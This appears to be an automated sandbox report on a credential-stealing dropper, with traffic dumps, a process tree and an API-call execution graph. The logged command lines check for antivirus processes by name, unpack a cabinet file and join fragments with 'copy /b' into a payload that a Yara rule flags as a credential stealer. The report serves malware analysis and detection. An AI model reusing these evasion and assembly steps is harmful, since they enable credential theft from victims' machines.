                                                                                                                                                                        2024-12-28 08:35:11 UTC1188INData Raw: 41 38 76 38 65 6d 68 56 73 47 42 38 42 67 70 63 4e 70 72 7a 75 68 7a 6a 48 48 64 6d 44 36 33 4d 71 71 51 6c 43 6f 4d 39 2f 49 53 53 61 32 39 4e 57 34 65 51 31 56 36 47 69 73 2f 56 79 53 43 64 4c 35 5a 39 41 65 55 4b 54 39 38 61 38 35 56 4c 4e 5a 7a 38 5a 74 53 65 58 4f 70 36 31 41 46 7a 54 70 51 70 33 4d 4c 4c 41 68 6b 4e 4a 2f 38 51 39 58 6f 75 66 32 76 6b 52 4d 76 79 6d 71 35 6c 55 52 67 38 2b 73 76 77 59 62 4e 75 64 74 2f 76 38 6f 38 69 4f 55 6c 77 2b 54 48 33 36 37 2b 4b 79 58 66 67 57 58 55 37 44 6d 4c 44 57 74 70 34 65 58 41 69 73 32 30 6c 4b 74 2f 32 69 31 42 4b 54 42 44 73 4d 53 65 34 62 65 72 35 52 34 53 5a 6b 5a 39 71 64 42 43 37 6a 37 67 37 46 50 4a 68 61 63 55 35 48 69 63 50 49 47 6a 4e 30 61 7a 77 46 2f 35 2f 66 35 68 6a 41 4f 69 44 50 55 74
                                                                                                                                                                        Data Ascii: A8v8emhVsGB8BgpcNprzuhzjHHdmD63MqqQlCoM9/ISSa29NW4eQ1V6Gis/VySCdL5Z9AeUKT98a85VLNZz8ZtSeXOp61AFzTpQp3MLLAhkNJ/8Q9Xouf2vkRMvymq5lURg8+svwYbNudt/v8o8iOUlw+TH367+KyXfgWXU7DmLDWtp4eXAis20lKt/2i1BKTBDsMSe4ber5R4SZkZ9qdBC7j7g7FPJhacU5HicPIGjN0azwF/5/f5hjAOiDPUt
                                                                                                                                                                        2024-12-28 08:35:11 UTC1369INData Raw: 31 63 65 63 0d 0a 56 52 4c 4d 4b 4f 6a 4e 54 43 69 6b 2f 4e 32 32 65 52 6f 4c 35 6b 69 44 36 56 43 6a 44 74 4c 70 66 4e 59 4a 52 62 4c 33 37 62 4a 6f 56 49 6f 33 74 4e 41 6f 4e 70 72 43 77 70 4d 44 53 68 72 46 62 34 7a 4c 57 62 55 64 33 35 52 2b 34 68 31 55 6b 34 7a 30 73 57 68 7a 75 51 44 33 2f 46 34 4a 6f 63 79 47 75 32 77 66 4c 2b 5a 78 6d 37 51 6d 70 7a 7a 66 6b 43 2b 58 4e 32 36 53 36 71 32 64 59 47 53 52 43 73 2f 4c 56 53 69 45 32 62 33 43 41 44 67 42 78 32 57 68 79 6c 71 55 44 37 48 47 4f 75 6f 65 57 5a 6d 48 32 62 49 39 55 62 49 75 30 65 68 51 46 5a 37 63 6e 4a 78 47 43 41 48 49 57 71 6e 72 5a 2f 45 48 33 2f 41 53 31 53 46 62 74 2b 58 6f 31 31 4e 35 72 44 7a 38 35 54 45 6a 2b 73 4c 43 76 48 38 6e 4e 64 42 47 38 64 49 6f 73 51 58 58 36 33 37 79 63
                                                                                                                                                                        Data Ascii: 1cecVRLMKOjNTCik/N22eRoL5kiD6VCjDtLpfNYJRbL37bJoVIo3tNAoNprCwpMDShrFb4zLWbUd35R+4h1Uk4z0sWhzuQD3/F4JocyGu2wfL+Zxm7QmpzzfkC+XN26S6q2dYGSRCs/LVSiE2b3CADgBx2WhylqUD7HGOuoeWZmH2bI9UbIu0ehQFZ7cnJxGCAHIWqnrZ/EH3/AS1SFbt+Xo11N5rDz85TEj+sLCvH8nNdBG8dIosQXX637yc
                                                                                                                                                                        2024-12-28 08:35:11 UTC1369INData Raw: 70 7a 48 4e 4b 6e 42 79 77 39 6b 34 38 72 36 71 71 78 31 52 48 4b 2f 73 79 71 2f 52 58 74 54 36 37 69 6a 48 69 41 48 75 51 30 4d 4c 49 56 52 4b 4a 4b 76 50 51 4b 44 69 46 79 70 66 41 59 78 4e 65 33 32 53 51 2f 6c 53 55 65 71 36 54 59 35 45 64 53 75 58 6c 32 72 42 65 57 70 4a 64 78 36 4e 62 55 4a 7a 58 74 4b 78 31 47 51 4b 53 55 36 4c 4d 58 49 59 4f 70 70 4a 39 7a 52 52 33 75 74 4b 73 6a 30 46 58 6e 69 44 31 34 6a 63 2b 67 4e 43 6b 6b 45 49 49 4e 4d 35 52 38 74 4e 4b 69 48 71 30 6c 44 44 58 42 67 32 33 2f 76 61 54 62 6c 65 73 44 4e 37 50 56 42 75 46 7a 71 75 34 42 6a 51 32 2f 7a 71 47 34 53 32 48 48 6f 53 51 41 2f 63 49 57 34 62 38 39 70 64 65 61 37 67 6a 31 65 34 2f 44 35 65 72 31 4b 39 4f 4a 46 2f 4f 64 72 58 38 4a 36 4d 6e 6a 66 55 69 77 67 4a 52 6a 65
                                                                                                                                                                        Data Ascii: pzHNKnByw9k48r6qqx1RHK/syq/RXtT67ijHiAHuQ0MLIVRKJKvPQKDiFypfAYxNe32SQ/lSUeq6TY5EdSuXl2rBeWpJdx6NbUJzXtKx1GQKSU6LMXIYOppJ9zRR3utKsj0FXniD14jc+gNCkkEIINM5R8tNKiHq0lDDXBg23/vaTblesDN7PVBuFzqu4BjQ2/zqG4S2HHoSQA/cIW4b89pdea7gj1e4/D5er1K9OJF/OdrX8J6MnjfUiwgJRje
                                                                                                                                                                        2024-12-28 08:35:11 UTC1369INData Raw: 61 4b 67 41 30 4d 68 67 44 65 4c 54 69 6f 56 38 43 6a 2f 72 63 36 37 73 4b 49 6b 46 6f 39 55 6d 31 68 42 49 70 59 6e 39 74 30 52 37 74 68 75 69 77 33 4d 5a 67 4e 4b 35 76 47 51 79 4e 4d 56 4d 71 75 31 7a 6b 77 75 68 79 44 2f 73 42 45 61 33 2f 50 2b 41 4f 47 71 57 4c 2b 50 75 64 52 47 6b 7a 39 57 4e 63 77 51 5a 6d 6a 57 33 6f 6c 4f 6b 42 74 66 67 50 4d 41 67 43 2b 4f 55 71 36 35 48 55 4a 6b 70 2f 4d 42 4c 44 4a 2f 76 71 61 4a 58 4a 41 72 73 63 62 37 2b 4e 59 51 78 73 76 45 48 78 78 4d 4f 75 34 37 61 31 33 42 38 71 46 6e 36 79 45 30 4e 37 66 32 4b 78 47 77 4e 4c 65 74 31 76 75 78 79 69 51 57 4a 31 53 2b 56 45 41 71 66 69 4d 36 33 51 6d 2b 32 41 4b 4c 63 55 42 6d 44 39 4c 6d 52 5a 44 56 63 78 55 7a 78 37 58 4f 54 43 39 50 49 65 2f 51 45 54 71 66 37 77 73 68
                                                                                                                                                                        Data Ascii: aKgA0MhgDeLTioV8Cj/rc67sKIkFo9Um1hBIpYn9t0R7thuiw3MZgNK5vGQyNMVMqu1zkwuhyD/sBEa3/P+AOGqWL+PudRGkz9WNcwQZmjW3olOkBtfgPMAgC+OUq65HUJkp/MBLDJ/vqaJXJArscb7+NYQxsvEHxxMOu47a13B8qFn6yE0N7f2KxGwNLet1vuxyiQWJ1S+VEAqfiM63Qm+2AKLcUBmD9LmRZDVcxUzx7XOTC9PIe/QETqf7wsh


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:03:34:22
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\Desktop\es5qBEFupj.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\es5qBEFupj.exe"
                                                                                                                                                                        Imagebase:0x340000
                                                                                                                                                                        File size:7'114'240 bytes
                                                                                                                                                                        MD5 hash:25C8F6ADA1179E3FCF486844E5C1ED24
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:7
                                                                                                                                                                        Start time:03:34:25
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:1'062'983 bytes
                                                                                                                                                                        MD5 hash:A3E9A86D6EDE94C3C71D1F7EEA537766
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 11%, ReversingLabs
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:8
                                                                                                                                                                        Start time:03:34:26
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Set-up.exe"
                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                        File size:6'851'208 bytes
                                                                                                                                                                        MD5 hash:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 70%, ReversingLabs
                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:10
                                                                                                                                                                        Start time:03:34:26
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:11
                                                                                                                                                                        Start time:03:34:26
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff75da10000
                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:13
                                                                                                                                                                        Start time:03:34:28
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                        Imagebase:0x7f0000
                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:14
                                                                                                                                                                        Start time:03:34:28
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                        Imagebase:0x280000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:15
                                                                                                                                                                        Start time:03:34:30
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                        Imagebase:0x7f0000
                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:16
                                                                                                                                                                        Start time:03:34:30
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                        Imagebase:0x280000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:17
                                                                                                                                                                        Start time:03:34:32
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c md 768400
                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:18
                                                                                                                                                                        Start time:03:34:32
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:extrac32 /Y /E Reflect
                                                                                                                                                                        Imagebase:0xd60000
                                                                                                                                                                        File size:29'184 bytes
                                                                                                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:19
                                                                                                                                                                        Start time:03:34:32
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:findstr /V "cocks" Articles
                                                                                                                                                                        Imagebase:0x280000
                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:20
                                                                                                                                                                        Start time:03:34:33
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
                                                                                                                                                                        Imagebase:0x410000
                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Target ID:21
                                                                                                                                                                        Start time:03:34:33
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:Climb.com V
                                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                                        File size:947'288 bytes
                                                                                                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Target ID:22
                                                                                                                                                                        Start time:03:34:33
                                                                                                                                                                        Start date:28/12/2024
                                                                                                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:choice /d y /t 5
                                                                                                                                                                        Imagebase:0xf30000
                                                                                                                                                                        File size:28'160 bytes
                                                                                                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Has exited:true

                                                                                                                                                                        Reset < >
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a7b80762a6676d5dfbf3da64df150262954bf5d258a629923d89c7c453f30bac
                                                                                                                                                                          • Instruction ID: 3833cae55269c6e400115154976f1d1658048b5d8a0d9073ed0e64b70c8fde06
                                                                                                                                                                          • Opcode Fuzzy Hash: a7b80762a6676d5dfbf3da64df150262954bf5d258a629923d89c7c453f30bac
                                                                                                                                                                          • Instruction Fuzzy Hash: 44514A34A00348CFDB09DFB8E5956AE7BB3EF89304F5045A8D0006B398DB75E949CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 48e8270b0a35668aec55424624c7122bb029138252e7eaf63675f33d80a08ca8
                                                                                                                                                                          • Instruction ID: d7155a90dd7301e9d1c032c7fce0631c2997a41533481f4b4ba93006ab170b87
                                                                                                                                                                          • Opcode Fuzzy Hash: 48e8270b0a35668aec55424624c7122bb029138252e7eaf63675f33d80a08ca8
                                                                                                                                                                          • Instruction Fuzzy Hash: 5461D3307142049FCB18EB78E15DBAABBA7BF84301F55806AD55A97395DFB0EC01CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3815aadc432d1e61ff3ce968d35b2e38d4f596ec858623db06a4694458549f41
                                                                                                                                                                          • Instruction ID: a7e237a046db0097335c73357102e601702436b18b30821dea5911dfea2fd3a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 3815aadc432d1e61ff3ce968d35b2e38d4f596ec858623db06a4694458549f41
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A41E834A10309CBDB08DFB8E5956AEBBB3EF89304F604568D1006B398DB75E949CB91
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1333568293.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_54e0000_es5qBEFupj.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0d73c2b93915536fab4a413760b20168a313dcbaa50a0ecf182918a58c3ab7eb
                                                                                                                                                                          • Instruction ID: d469911053b1c616465a241ba2e47827233f3f1c9c2dd1572ced25e4fc1ad752
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d73c2b93915536fab4a413760b20168a313dcbaa50a0ecf182918a58c3ab7eb
                                                                                                                                                                          • Instruction Fuzzy Hash: 8C314131B002554FCB04D7BDA498AFEBBE6EF88211F04446AD42D97342DA70ED02CBD1

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:17.6%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:21%
                                                                                                                                                                          Total number of Nodes:1482
                                                                                                                                                                          Total number of Limit Nodes:26
                                                                                                                                                                          execution_graph 4186 402fc0 4187 401446 18 API calls 4186->4187 4188 402fc7 4187->4188 4189 401a13 4188->4189 4190 403017 4188->4190 4191 40300a 4188->4191 4193 406831 18 API calls 4190->4193 4192 401446 18 API calls 4191->4192 4192->4189 4193->4189 4194 4023c1 4195 40145c 18 API calls 4194->4195 4196 4023c8 4195->4196 4199 407296 4196->4199 4202 406efe CreateFileW 4199->4202 4203 406f30 4202->4203 4204 406f4a ReadFile 4202->4204 4205 4062cf 11 API calls 4203->4205 4206 4023d6 4204->4206 4209 406fb0 4204->4209 4205->4206 4207 406fc7 ReadFile lstrcpynA lstrcmpA 4207->4209 4210 40700e SetFilePointer ReadFile 4207->4210 4208 40720f CloseHandle 4208->4206 4209->4206 4209->4207 4209->4208 4211 407009 4209->4211 4210->4208 4212 4070d4 ReadFile 4210->4212 4211->4208 4213 407164 4212->4213 4213->4211 4213->4212 4214 40718b SetFilePointer GlobalAlloc ReadFile 4213->4214 4215 4071eb lstrcpynW GlobalFree 4214->4215 4216 4071cf 4214->4216 4215->4208 4216->4215 4216->4216 4217 401cc3 4218 40145c 18 API calls 4217->4218 4219 401cca lstrlenW 4218->4219 4220 4030dc 4219->4220 4221 4030e3 4220->4221 4223 405f7d wsprintfW 4220->4223 4223->4221 4224 401c46 4225 40145c 18 API calls 4224->4225 4226 401c4c 4225->4226 4227 4062cf 11 API calls 4226->4227 4228 401c59 4227->4228 4229 406cc7 81 API calls 4228->4229 4230 401c64 4229->4230 4231 403049 4232 401446 18 API calls 4231->4232 4233 403050 4232->4233 4234 406831 18 API calls 4233->4234 4235 401a13 4233->4235 4234->4235 4236 40204a 4237 401446 18 API calls 4236->4237 4238 402051 IsWindow 4237->4238 4239 4018d3 4238->4239 4240 40324c 4241 403277 4240->4241 4242 40325e SetTimer 4240->4242 4243 4032cc 4241->4243 4244 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4241->4244 4242->4241 4244->4243 4245 4022cc 4246 40145c 18 API calls 4245->4246 4247 4022d3 4246->4247 4248 406301 2 API calls 4247->4248 4249 4022d9 4248->4249 4251 4022e8 4249->4251 4254 405f7d wsprintfW 4249->4254 4252 4030e3 4251->4252 4255 405f7d wsprintfW 4251->4255 4254->4251 4255->4252 4256 4030cf 4257 40145c 18 API calls 4256->4257 4258 4030d6 4257->4258 4260 4030dc 4258->4260 4263 4063d8 GlobalAlloc lstrlenW 4258->4263 4261 4030e3 4260->4261 4290 405f7d wsprintfW 4260->4290 4264 406460 4263->4264 4265 40640e 4263->4265 4264->4260 4266 40643b GetVersionExW 4265->4266 4291 406057 CharUpperW 4265->4291 4266->4264 4267 40646a 4266->4267 4268 406490 LoadLibraryA 4267->4268 4269 406479 4267->4269 4268->4264 4272 4064ae GetProcAddress GetProcAddress GetProcAddress 4268->4272 4269->4264 4271 4065b1 GlobalFree 4269->4271 4273 4065c7 LoadLibraryA 4271->4273 4274 406709 FreeLibrary 4271->4274 4275 406621 4272->4275 4279 4064d6 4272->4279 4273->4264 4277 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4273->4277 4274->4264 4276 40667d FreeLibrary 4275->4276 4278 406656 4275->4278 4276->4278 4277->4275 4282 406716 4278->4282 4287 4066b1 lstrcmpW 4278->4287 4288 4066e2 CloseHandle 4278->4288 4289 406700 CloseHandle 4278->4289 4279->4275 4280 406516 4279->4280 4281 4064fa FreeLibrary GlobalFree 4279->4281 4280->4271 4283 406528 lstrcpyW OpenProcess 4280->4283 4285 40657b CloseHandle CharUpperW lstrcmpW 4280->4285 4281->4264 4284 40671b CloseHandle FreeLibrary 4282->4284 4283->4280 4283->4285 4286 406730 CloseHandle 4284->4286 4285->4275 4285->4280 4286->4284 4287->4278 4287->4286 4288->4278 4289->4274 4290->4261 4291->4265 4292 4044d1 4293 40450b 4292->4293 4294 40453e 4292->4294 4360 405cb0 GetDlgItemTextW 4293->4360 4295 40454b GetDlgItem GetAsyncKeyState 4294->4295 4299 4045dd 4294->4299 4297 40456a GetDlgItem 4295->4297 4310 404588 4295->4310 4302 403d6b 19 API calls 4297->4302 4298 4046c9 4358 40485f 4298->4358 4362 405cb0 GetDlgItemTextW 4298->4362 4299->4298 4307 406831 18 API calls 4299->4307 4299->4358 4300 404516 4301 406064 5 API calls 4300->4301 4303 40451c 4301->4303 4305 40457d ShowWindow 4302->4305 4306 403ea0 5 API calls 4303->4306 4305->4310 4311 404521 GetDlgItem 4306->4311 4312 40465b SHBrowseForFolderW 4307->4312 4308 4046f5 4313 4067aa 18 API calls 4308->4313 4309 403df6 8 API calls 4314 404873 4309->4314 4315 4045a5 SetWindowTextW 4310->4315 4319 405d85 4 API calls 4310->4319 4316 40452f IsDlgButtonChecked 4311->4316 4311->4358 4312->4298 4318 404673 CoTaskMemFree 4312->4318 4323 4046fb 4313->4323 4317 403d6b 19 API calls 4315->4317 4316->4294 4321 4045c3 4317->4321 4322 40674e 3 API calls 4318->4322 4320 40459b 4319->4320 4320->4315 4327 40674e 3 API calls 4320->4327 4324 403d6b 19 API calls 4321->4324 4325 404680 4322->4325 4363 406035 lstrcpynW 4323->4363 4328 4045ce 4324->4328 4329 4046b7 SetDlgItemTextW 4325->4329 4334 406831 18 API calls 4325->4334 4327->4315 4361 403dc4 SendMessageW 4328->4361 4329->4298 4330 404712 4332 406328 3 API calls 4330->4332 4341 40471a 4332->4341 4333 4045d6 4335 406328 3 API calls 4333->4335 4336 40469f lstrcmpiW 4334->4336 4335->4299 4336->4329 4339 4046b0 lstrcatW 4336->4339 4337 40475c 4364 406035 lstrcpynW 4337->4364 4339->4329 4340 404765 4342 405d85 4 API calls 4340->4342 4341->4337 4345 40677d 2 API calls 4341->4345 4347 4047b1 4341->4347 4343 40476b GetDiskFreeSpaceW 4342->4343 4346 40478f MulDiv 4343->4346 4343->4347 4345->4341 4346->4347 4348 40480e 4347->4348 4365 4043d9 4347->4365 4349 404831 4348->4349 4351 40141d 80 API calls 4348->4351 4373 403db1 KiUserCallbackDispatcher 4349->4373 4351->4349 4352 4047ff 4354 404810 SetDlgItemTextW 4352->4354 4355 404804 4352->4355 4354->4348 4357 4043d9 21 API calls 4355->4357 4356 40484d 4356->4358 4374 403d8d 4356->4374 4357->4348 4358->4309 4360->4300 4361->4333 4362->4308 4363->4330 4364->4340 4366 4043f9 4365->4366 4367 406831 18 API calls 4366->4367 4368 404439 4367->4368 4369 406831 18 API calls 4368->4369 4370 404444 4369->4370 4371 406831 18 API calls 4370->4371 4372 404454 lstrlenW wsprintfW SetDlgItemTextW 4371->4372 4372->4352 4373->4356 4375 403da0 SendMessageW 4374->4375 4376 403d9b 4374->4376 4375->4358 4376->4375 4377 401dd3 4378 401446 18 API calls 4377->4378 4379 401dda 4378->4379 4380 401446 18 API calls 4379->4380 4381 4018d3 4380->4381 4382 402e55 4383 40145c 18 API calls 4382->4383 4384 402e63 4383->4384 4385 402e79 4384->4385 4386 40145c 18 API calls 4384->4386 4387 405e5c 2 API calls 4385->4387 4386->4385 4388 402e7f 